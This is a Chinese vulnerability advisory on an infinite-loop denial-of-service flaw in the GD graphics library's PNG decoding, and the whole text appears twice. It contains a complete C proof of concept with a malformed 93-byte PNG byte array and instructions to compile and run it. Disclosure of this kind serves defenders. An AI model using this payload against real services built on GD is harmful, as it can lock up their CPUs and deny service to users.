GD是一个开源的代码库,用于为站点动态创建图形。 GD图形库在处理畸形的PNG图形时存在漏洞,远程攻击者可能利用此漏洞导致相关的应用进入死循环。 GD库的libpng解码器的libpng代码(png_read_data())与libgd回调(gdPngReadData())之间没有正确地检测截短的输入,导致死循环,libpng的png_read_info()函数无法返回,函数库会消耗100\\%的CPU资源。 /* id: gdbad3.c, Xavier Roche, May. 2007 */ /* gcc gdbad3.c -o bad -lgd & & ./bad */ #include <stdio.h> #include <stdlib.h> #include \"gd.h\" static const unsigned char pngdata[93]; int main(void) { gdImagePtr im; if ( ( im = gdImageCreateFromPngPtr(93, (char*) &pngdata[0]) ) != NULL) { fprintf(stderr, \"success!\n\"); gdImageDestroy(im); } else { fprintf(stderr, \"failed!\n\"); } return 0; } /* PNG data */ static const unsigned char pngdata[93] = {137,80,78,71,13,10,26,10,0,0, 0,13,73,72,68,82,0,0,0,120,0,0,0,131,8,6,0,0,0,70,49,223,8,0,0,0,6,98, 75,71,68,0,255,0,255,0,255,160,189,167,147,0,0,0,9,112,72,89,115,0,0,92, 70,0,0,92,70,1,20,148,67,65,0,0,0,9,118,112,65,103,0,0,0,120,0,0,0,131, 0,226,13,249,45}; 如果用户up到png_read_info()并试图finish的话,就可以看到函数由于无限的调用gdPngReadData()而无法返回。
GD是一个开源的代码库,用于为站点动态创建图形。 GD图形库在处理畸形的PNG图形时存在漏洞,远程攻击者可能利用此漏洞导致相关的应用进入死循环。 GD库的libpng解码器的libpng代码(png_read_data())与libgd回调(gdPngReadData())之间没有正确地检测截短的输入,导致死循环,libpng的png_read_info()函数无法返回,函数库会消耗100\\%的CPU资源。 /* id: gdbad3.c, Xavier Roche, May. 2007 */ /* gcc gdbad3.c -o bad -lgd & & ./bad */ #include <stdio.h> #include <stdlib.h> #include \"gd.h\" static const unsigned char pngdata[93]; int main(void) { gdImagePtr im; if ( ( im = gdImageCreateFromPngPtr(93, (char*) &pngdata[0]) ) != NULL) { fprintf(stderr, \"success!\n\"); gdImageDestroy(im); } else { fprintf(stderr, \"failed!\n\"); } return 0; } /* PNG data */ static const unsigned char pngdata[93] = {137,80,78,71,13,10,26,10,0,0, 0,13,73,72,68,82,0,0,0,120,0,0,0,131,8,6,0,0,0,70,49,223,8,0,0,0,6,98, 75,71,68,0,255,0,255,0,255,160,189,167,147,0,0,0,9,112,72,89,115,0,0,92, 70,0,0,92,70,1,20,148,67,65,0,0,0,9,118,112,65,103,0,0,0,120,0,0,0,131, 0,226,13,249,45}; 如果用户up到png_read_info()并试图finish的话,就可以看到函数由于无限的调用gdPngReadData()而无法返回。